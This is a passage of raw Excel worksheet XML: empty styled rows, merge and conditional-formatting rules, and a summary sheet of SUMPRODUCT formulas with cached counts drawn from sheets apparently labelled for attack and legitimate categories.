      <c r="W1080" s="1"/>
      <c r="X1080" s="1"/>
      <c r="Y1080" s="1"/>
      <c r="Z1080" s="1"/>
      <c r="AA1080" s="1"/>
      <c r="AB1080" s="1"/>
      <c r="AC1080" s="1"/>
      <c r="AD1080" s="1"/>
      <c r="AE1080" s="3"/>
      <c r="AF1080" s="3"/>
      <c r="AG1080" s="3"/>
      <c r="AH1080" s="3"/>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row>
    <row r="1081" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1081" s="15"/>
      <c r="B1081" s="3"/>
      <c r="C1081" s="3"/>
      <c r="D1081" s="1"/>
      <c r="E1081" s="1"/>
      <c r="F1081" s="3"/>
      <c r="G1081" s="3"/>
      <c r="H1081" s="3"/>
      <c r="I1081" s="3"/>
      <c r="J1081" s="3"/>
      <c r="K1081" s="1"/>
      <c r="L1081" s="1"/>
      <c r="M1081" s="1"/>
      <c r="N1081" s="1"/>
      <c r="O1081" s="1"/>
      <c r="P1081" s="1"/>
      <c r="Q1081" s="1"/>
      <c r="R1081" s="1"/>
      <c r="S1081" s="1"/>
      <c r="T1081" s="1"/>
      <c r="U1081" s="1"/>
      <c r="V1081" s="1"/>
      <c r="W1081" s="1"/>
      <c r="X1081" s="1"/>
      <c r="Y1081" s="1"/>
      <c r="Z1081" s="1"/>
      <c r="AA1081" s="1"/>
      <c r="AB1081" s="1"/>
      <c r="AC1081" s="1"/>
      <c r="AD1081" s="1"/>
      <c r="AE1081" s="3"/>
      <c r="AF1081" s="3"/>
      <c r="AG1081" s="3"/>
      <c r="AH1081" s="3"/>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row>
    <row r="1082" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1082" s="15"/>
      <c r="B1082" s="3"/>
      <c r="C1082" s="3"/>
      <c r="D1082" s="1"/>
      <c r="E1082" s="1"/>
      <c r="F1082" s="3"/>
      <c r="G1082" s="3"/>
      <c r="H1082" s="3"/>
      <c r="I1082" s="3"/>
      <c r="J1082" s="3"/>
      <c r="K1082" s="1"/>
      <c r="L1082" s="1"/>
      <c r="M1082" s="1"/>
      <c r="N1082" s="1"/>
      <c r="O1082" s="1"/>
      <c r="P1082" s="1"/>
      <c r="Q1082" s="1"/>
      <c r="R1082" s="1"/>
      <c r="S1082" s="1"/>
      <c r="T1082" s="1"/>
      <c r="U1082" s="1"/>
      <c r="V1082" s="1"/>
      <c r="W1082" s="1"/>
      <c r="X1082" s="1"/>
      <c r="Y1082" s="1"/>
      <c r="Z1082" s="1"/>
      <c r="AA1082" s="1"/>
      <c r="AB1082" s="1"/>
      <c r="AC1082" s="1"/>
      <c r="AD1082" s="1"/>
      <c r="AE1082" s="3"/>
      <c r="AF1082" s="3"/>
      <c r="AG1082" s="3"/>
      <c r="AH1082" s="3"/>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row>
    <row r="1083" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1083" s="15"/>
      <c r="B1083" s="3"/>
      <c r="C1083" s="3"/>
      <c r="D1083" s="1"/>
      <c r="E1083" s="1"/>
      <c r="F1083" s="3"/>
      <c r="G1083" s="3"/>
      <c r="H1083" s="3"/>
      <c r="I1083" s="3"/>
      <c r="J1083" s="3"/>
      <c r="K1083" s="1"/>
      <c r="L1083" s="1"/>
      <c r="M1083" s="1"/>
      <c r="N1083" s="1"/>
      <c r="O1083" s="1"/>
      <c r="P1083" s="1"/>
      <c r="Q1083" s="1"/>
      <c r="R1083" s="1"/>
      <c r="S1083" s="1"/>
      <c r="T1083" s="1"/>
      <c r="U1083" s="1"/>
      <c r="V1083" s="1"/>
      <c r="W1083" s="1"/>
      <c r="X1083" s="1"/>
      <c r="Y1083" s="1"/>
      <c r="Z1083" s="1"/>
      <c r="AA1083" s="1"/>
      <c r="AB1083" s="1"/>
      <c r="AC1083" s="1"/>
      <c r="AD1083" s="1"/>
      <c r="AE1083" s="3"/>
      <c r="AF1083" s="3"/>
      <c r="AG1083" s="3"/>
      <c r="AH1083" s="3"/>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row>
    <row r="1084" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1084" s="15"/>
      <c r="B1084" s="3"/>
      <c r="C1084" s="3"/>
      <c r="D1084" s="1"/>
      <c r="E1084" s="1"/>
      <c r="F1084" s="3"/>
      <c r="G1084" s="3"/>
      <c r="H1084" s="3"/>
      <c r="I1084" s="3"/>
      <c r="J1084" s="3"/>
      <c r="K1084" s="1"/>
      <c r="L1084" s="1"/>
      <c r="M1084" s="1"/>
      <c r="N1084" s="1"/>
      <c r="O1084" s="1"/>
      <c r="P1084" s="1"/>
      <c r="Q1084" s="1"/>
      <c r="R1084" s="1"/>
      <c r="S1084" s="1"/>
      <c r="T1084" s="1"/>
      <c r="U1084" s="1"/>
      <c r="V1084" s="1"/>
      <c r="W1084" s="1"/>
      <c r="X1084" s="1"/>
      <c r="Y1084" s="1"/>
      <c r="Z1084" s="1"/>
      <c r="AA1084" s="1"/>
      <c r="AB1084" s="1"/>
      <c r="AC1084" s="1"/>
      <c r="AD1084" s="1"/>
      <c r="AE1084" s="3"/>
      <c r="AF1084" s="3"/>
      <c r="AG1084" s="3"/>
      <c r="AH1084" s="3"/>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row>
    <row r="1085" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1085" s="15"/>
      <c r="B1085" s="3"/>
      <c r="C1085" s="3"/>
      <c r="D1085" s="1"/>
      <c r="E1085" s="1"/>
      <c r="F1085" s="3"/>
      <c r="G1085" s="3"/>
      <c r="H1085" s="3"/>
      <c r="I1085" s="3"/>
      <c r="J1085" s="3"/>
      <c r="K1085" s="1"/>
      <c r="L1085" s="1"/>
      <c r="M1085" s="1"/>
      <c r="N1085" s="1"/>
      <c r="O1085" s="1"/>
      <c r="P1085" s="1"/>
      <c r="Q1085" s="1"/>
      <c r="R1085" s="1"/>
      <c r="S1085" s="1"/>
      <c r="T1085" s="1"/>
      <c r="U1085" s="1"/>
      <c r="V1085" s="1"/>
      <c r="W1085" s="1"/>
      <c r="X1085" s="1"/>
      <c r="Y1085" s="1"/>
      <c r="Z1085" s="1"/>
      <c r="AA1085" s="1"/>
      <c r="AB1085" s="1"/>
      <c r="AC1085" s="1"/>
      <c r="AD1085" s="1"/>
      <c r="AE1085" s="3"/>
      <c r="AF1085" s="3"/>
      <c r="AG1085" s="3"/>
      <c r="AH1085" s="3"/>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row>
    <row r="1086" spans="1:93" s="7" customFormat="1" ht="15.75" customHeight="1">
      <c r="A1086" s="15"/>
      <c r="B1086" s="3"/>
      <c r="C1086" s="3"/>
      <c r="D1086" s="1"/>
      <c r="E1086" s="1"/>
      <c r="F1086" s="3"/>
      <c r="G1086" s="3"/>
      <c r="H1086" s="3"/>
      <c r="I1086" s="3"/>
      <c r="J1086" s="3"/>
      <c r="K1086" s="1"/>
      <c r="L1086" s="1"/>
      <c r="M1086" s="1"/>
      <c r="N1086" s="1"/>
      <c r="O1086" s="1"/>
      <c r="P1086" s="1"/>
      <c r="Q1086" s="1"/>
      <c r="R1086" s="1"/>
      <c r="S1086" s="1"/>
      <c r="T1086" s="1"/>
      <c r="U1086" s="1"/>
      <c r="V1086" s="1"/>
      <c r="W1086" s="1"/>
      <c r="X1086" s="1"/>
      <c r="Y1086" s="1"/>
      <c r="Z1086" s="1"/>
      <c r="AA1086" s="1"/>
      <c r="AB1086" s="1"/>
      <c r="AC1086" s="1"/>
      <c r="AD1086" s="1"/>
      <c r="AE1086" s="3"/>
      <c r="AF1086" s="3"/>
      <c r="AG1086" s="3"/>
      <c r="AH1086" s="3"/>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row>
  </sheetData>
  <autoFilter ref="A2:AC79" xr:uid="{00000000-0009-0000-0000-000008000000}"/>
  <mergeCells count="22">
    <mergeCell ref="A79:C79"/>
    <mergeCell ref="AQ1:AV1"/>
    <mergeCell ref="AW1:BB1"/>
    <mergeCell ref="BC1:BH1"/>
    <mergeCell ref="BI1:BN1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:R1"/>
    <mergeCell ref="S1:X1"/>
    <mergeCell ref="Y1:AD1"/>
    <mergeCell ref="AE1:AJ1"/>
    <mergeCell ref="AK1:AP1"/>
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:C2"/>
    <mergeCell ref="D1:D2"/>
    <mergeCell ref="E1:E2"/>
    <mergeCell ref="H81:Q81"/>
    <mergeCell ref="F1:F2"/>
    <mergeCell ref="CB1:CH1"/>
    <mergeCell ref="BO1:BU1"/>
    <mergeCell ref="BV1:CA1"/>
    <mergeCell ref="K80:Q80"/>
  </mergeCells>
  <conditionalFormatting sqref="K3:K78 Q3:Q78 W3:W78">
    <cfRule type="expression" dxfId="388" priority="58">
      <formula>IF(K3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="387" priority="56">
      <formula>IF(K3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="386" priority="57">
      <formula>IF(K3=0,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L3:L78">
    <cfRule type="expression" dxfId="385" priority="37">
      <formula>IF(L3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="R3:R78">
    <cfRule type="expression" dxfId="384" priority="36">
      <formula>IF(R3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="X3:X78">
    <cfRule type="expression" dxfId="383" priority="35">
      <formula>IF(X3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="Y3:Y78">
    <cfRule type="expression" dxfId="382" priority="5">
      <formula>IF(Y3&lt;G3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="Z3">
    <cfRule type="expression" dxfId="381" priority="4">
      <formula>IF(Z3&lt;H3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AB3:AE78">
    <cfRule type="expression" dxfId="380" priority="1">
      <formula>IF(AB3&lt;J3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AC3:AC78">
    <cfRule type="expression" dxfId="379" priority="7">
      <formula>IF(AC3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="378" priority="8">
      <formula>IF(AC3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="377" priority="9">
      <formula>IF(AC3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AD3:AD78">
    <cfRule type="expression" dxfId="376" priority="6">
      <formula>IF(AD3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AF3">
    <cfRule type="expression" dxfId="375" priority="22">
      <formula>IF(AF3&lt;N3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AH3:AK78">
    <cfRule type="expression" dxfId="374" priority="14">
      <formula>IF(AH3&lt;P3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AI3:AI78">
    <cfRule type="expression" dxfId="373" priority="25">
      <formula>IF(AI3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="372" priority="26">
      <formula>IF(AI3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="371" priority="27">
      <formula>IF(AI3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AJ3:AJ78">
    <cfRule type="expression" dxfId="370" priority="24">
      <formula>IF(AJ3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AL3">
    <cfRule type="expression" dxfId="369" priority="13">
      <formula>IF(AL3&lt;T3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AN3:AP78">
    <cfRule type="expression" dxfId="368" priority="10">
      <formula>IF(AN3&lt;V3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AO3:AO78">
    <cfRule type="expression" dxfId="367" priority="16">
      <formula>IF(AO3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="366" priority="17">
      <formula>IF(AO3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="365" priority="18">
      <formula>IF(AO3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AP3:AP78">
    <cfRule type="expression" dxfId="364" priority="15">
      <formula>IF(AP3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AU3:AU78 BA3:BA78">
    <cfRule type="expression" dxfId="363" priority="53">
      <formula>IF(AU3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="362" priority="54">
      <formula>IF(AU3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="361" priority="55">
      <formula>IF(AU3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AV3:AV78">
    <cfRule type="expression" dxfId="360" priority="34">
      <formula>IF(AV3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BB3:BB78">
    <cfRule type="expression" dxfId="359" priority="33">
      <formula>IF(BB3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BG3:BG78">
    <cfRule type="expression" dxfId="358" priority="51">
      <formula>IF(BG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="357" priority="52">
      <formula>IF(BG3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="356" priority="50">
      <formula>IF(BG3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BH3:BH78">
    <cfRule type="expression" dxfId="355" priority="32">
      <formula>IF(BH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BM3:BM78">
    <cfRule type="expression" dxfId="354" priority="40">
      <formula>IF(BM3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="353" priority="38">
      <formula>IF(BM3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="352" priority="39">
      <formula>IF(BM3=0,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BN3:BN78">
    <cfRule type="expression" dxfId="351" priority="31">
      <formula>IF(BN3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BT3:BT78">
    <cfRule type="expression" dxfId="350" priority="42">
      <formula>IF(BT3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="349" priority="43">
      <formula>IF(BT3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="348" priority="41">
      <formula>IF(BT3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BU3:BU78">
    <cfRule type="expression" dxfId="347" priority="30">
      <formula>IF(BU3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BZ3:BZ78">
    <cfRule type="expression" dxfId="346" priority="44">
      <formula>IF(BZ3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="345" priority="45">
      <formula>IF(BZ3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="344" priority="46">
      <formula>IF(BZ3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CA3:CA78">
    <cfRule type="expression" dxfId="343" priority="29">
      <formula>IF(CA3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CG3:CG78">
    <cfRule type="expression" dxfId="342" priority="47">
      <formula>IF(CG3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="341" priority="48">
      <formula>IF(CG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="340" priority="49">
      <formula>IF(CG3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CH3:CH78">
    <cfRule type="expression" dxfId="339" priority="28">
      <formula>IF(CH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="1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6">
    <tabColor rgb="FFFF6D8C"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S36"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <pane xSplit="1" ySplit="2" topLeftCell="B3" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="L32" sqref="L32"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="25.140625" style="26" customWidth="1"/>
    <col min="2" max="2" width="11" style="26" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11.42578125" style="26" customWidth="1"/>
    <col min="4" max="4" width="11" style="26" customWidth="1"/>
    <col min="5" max="5" width="11.42578125" style="26" customWidth="1"/>
    <col min="6" max="7" width="11" style="26" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="26" customWidth="1"/>
    <col min="9" max="9" width="11" style="26" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" customWidth="1"/>
    <col min="11" max="11" width="15" style="26" customWidth="1"/>
    <col min="12" max="12" width="22.28515625" style="26" customWidth="1"/>
    <col min="13" max="13" width="15.85546875" style="26" customWidth="1"/>
    <col min="14" max="14" width="28.5703125" style="26" customWidth="1"/>
    <col min="15" max="15" width="14.5703125" style="26" customWidth="1"/>
    <col min="16" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19">
      <c r="A1" s="146"/>
      <c r="B1" s="713" t="s">
        <v>2465</v>
      </c>
      <c r="C1" s="714"/>
      <c r="D1" s="714"/>
      <c r="E1" s="714"/>
      <c r="F1" s="714"/>
      <c r="G1" s="714"/>
      <c r="H1" s="714"/>
      <c r="I1" s="714"/>
      <c r="J1" s="714"/>
      <c r="K1" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L1" s="702"/>
      <c r="M1" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N1" s="704"/>
    </row>
    <row r="2" spans="1:19" ht="25.5" customHeight="1" thickBot="1">
      <c r="A2" s="442" t="s">
        <v>641</v>
      </c>
      <c r="B2" s="438" t="s">
        <v>0</v>
      </c>
      <c r="C2" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D2" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E2" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F2" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G2" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H2" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I2" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J2" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K2" s="416" t="s">
        <v>2347</v>
      </c>
      <c r="L2" s="417" t="s">
        <v>2466</v>
      </c>
      <c r="M2" s="419" t="s">
        <v>2347</v>
      </c>
      <c r="N2" s="420" t="s">
        <v>2467</v>
      </c>
      <c r="S2" s="214"/>
    </row>
    <row r="3" spans="1:19" ht="15" customHeight="1">
      <c r="A3" s="443" t="s">
        <v>4463</v>
      </c>
      <c r="B3" s="717">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$E$79</f>
        <v>3573695</v>
      </c>
      <c r="C3" s="717"/>
      <c r="D3" s="717"/>
      <c r="E3" s="717"/>
      <c r="F3" s="717"/>
      <c r="G3" s="717"/>
      <c r="H3" s="717"/>
      <c r="I3" s="717"/>
      <c r="J3" s="717"/>
      <c r="K3" s="717"/>
      <c r="L3" s="717"/>
      <c r="M3" s="717"/>
      <c r="N3" s="718"/>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="15" customHeight="1">
      <c r="A4" s="444" t="s">
        <v>4464</v>
      </c>
      <c r="B4" s="719">
        <f>'Tabla 3 (Legítimo)'!$B$3</f>
        <v>78694206</v>
      </c>
      <c r="C4" s="719"/>
      <c r="D4" s="719"/>
      <c r="E4" s="719"/>
      <c r="F4" s="719"/>
      <c r="G4" s="719"/>
      <c r="H4" s="719"/>
      <c r="I4" s="719"/>
      <c r="J4" s="719"/>
      <c r="K4" s="719"/>
      <c r="L4" s="719"/>
      <c r="M4" s="719"/>
      <c r="N4" s="720"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A5" s="445" t="s">
        <v>4465</v>
      </c>
      <c r="B5" s="719">
        <f>$B$4+$B$3</f>
        <v>82267901</v>
      </c>
      <c r="C5" s="719"/>
      <c r="D5" s="719"/>
      <c r="E5" s="719"/>
      <c r="F5" s="719"/>
      <c r="G5" s="719"/>
      <c r="H5" s="719"/>
      <c r="I5" s="719"/>
      <c r="J5" s="719"/>
      <c r="K5" s="719"/>
      <c r="L5" s="719"/>
      <c r="M5" s="719"/>
      <c r="N5" s="720"/>
      <c r="O5" s="725" t="s">
        <v>658</v>
      </c>
      <c r="P5" s="726"/>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19" ht="15" customHeight="1">
      <c r="A6" s="478" t="s">
        <v>4453</v>
      </c>
      <c r="B6" s="439">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!K3:K78)</f>
        <v>71</v>
      </c>
      <c r="C6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!Q3:Q78)</f>
        <v>46</v>
      </c>
      <c r="D6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!W3:W78)</f>
        <v>80</v>
      </c>
      <c r="E6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!AC3:AC78)</f>
        <v>96</v>
      </c>
      <c r="F6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!AI3:AI78)</f>
        <v>109</v>
      </c>
      <c r="G6" s="482">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!AO3:AO78)</f>
        <v>109</v>
      </c>
      <c r="H6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!AU3:AU78)</f>
        <v>1</v>
      </c>
      <c r="I6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!BA3:BA78)</f>
        <v>39</v>
      </c>
      <c r="J6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!BG3:BG78)</f>
        <v>84</v>
      </c>
      <c r="K6" s="433">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!BM3:BM78)</f>
        <v>51.333333333333336</v>
      </c>
      <c r="L6" s="307">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!BT3:BT78)</f>
        <v>101.33333333333333</v>
      </c>
      <c r="M6" s="433">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!BZ3:BZ78)</f>
        <v>27</v>
      </c>
      <c r="N6" s="307">
        <f>SUMPRODUCT('T2 (At) S&lt;=2, FG&gt;=3'!$D3:$D$78,'T2 (At) S&lt;=2, FG&gt;=3'!CG3:CG78)</f>
        <v>65</v>
      </c>
      <c r="O6" s="723" t="s">
        <v>667</v>
      </c>
      <c r="P6" s="724"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19" ht="15" customHeight="1">
      <c r="A7" s="479" t="s">
        <v>4454</v>
      </c>
      <c r="B7" s="440">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - B6</f>
        <v>39</v>
      </c>
      <c r="C7" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - C6</f>
        <v>64</v>
      </c>
      <c r="D7" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - D6</f>
        <v>30</v>
      </c>
      <c r="E7" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - E6</f>
        <v>14</v>
      </c>
      <c r="F7" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - F6</f>
        <v>1</v>
      </c>
      <c r="G7" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - G6</f>
        <v>1</v>
      </c>
      <c r="H7" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - H6</f>
        <v>109</v>
      </c>
      <c r="I7" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - I6</f>
        <v>71</v>
      </c>
      <c r="J7" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - J6</f>
        <v>26</v>
      </c>
      <c r="K7" s="434">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - K6</f>
        <v>58.666666666666664</v>
      </c>
      <c r="L7" s="435">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - L6</f>
        <v>8.6666666666666714</v>
      </c>
      <c r="M7" s="434">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - M6</f>
        <v>83</v>
      </c>
      <c r="N7" s="435">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$D$79 - N6</f>
        <v>45</v>
      </c>
      <c r="O7" s="723"/>
      <c r="P7" s="724"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="15" customHeight="1">
      <c r="A8" s="446" t="s">
        <v>4148</v>
      </c>
      <c r="B8" s="519">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!G79</f>
        <v>35137</v>
      </c>
      <c r="C8" s="520">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!M79</f>
        <v>12929</v>
      </c>
      <c r="D8" s="520">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!S79</f>
        <v>48066</v>
      </c>
      <c r="E8" s="586">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!Y79</f>
        <v>1471187</v>
      </c>
      <c r="F8" s="586">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!AE79</f>
        <v>237540</v>
      </c>
      <c r="G8" s="586">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!AK79</f>
        <v>1698992</v>
      </c>
      <c r="H8" s="520">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!AQ79</f>
        <v>16</v>
      </c>
      <c r="I8" s="284">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!AW79</f>
        <v>13667</v>
      </c>
      <c r="J8" s="304">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!BC79</f>
        <v>61717</v>
      </c>
      <c r="K8" s="460">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!BI79</f>
        <v>319274</v>
      </c>
      <c r="L8" s="308">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!BO79</f>
        <v>1651667</v>
      </c>
      <c r="M8" s="460">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!BV79</f>
        <v>19938</v>
      </c>
      <c r="N8" s="308">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!CB79</f>
        <v>3992985</v>
      </c>
      <c r="O8" s="556"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A9" s="565" t="s">
        <v>4455</v>
      </c>
      <c r="B9" s="523">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!H79</f>
        <v>12783</v>
      </c>
      <c r="C9" s="524">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!N79</f>
        <v>4878</v>
      </c>
      <c r="D9" s="524">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!T79</f>
        <v>17661</v>
      </c>
      <c r="E9" s="587">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!Z79</f>
        <v>378848</v>
      </c>
      <c r="F9" s="587">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!AF79</f>
        <v>73630</v>
      </c>
      <c r="G9" s="587">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!AL79</f>
        <v>449353</v>
      </c>
      <c r="H9" s="524">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!AR79</f>
        <v>2</v>
      </c>
      <c r="I9" s="285">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!AX79</f>
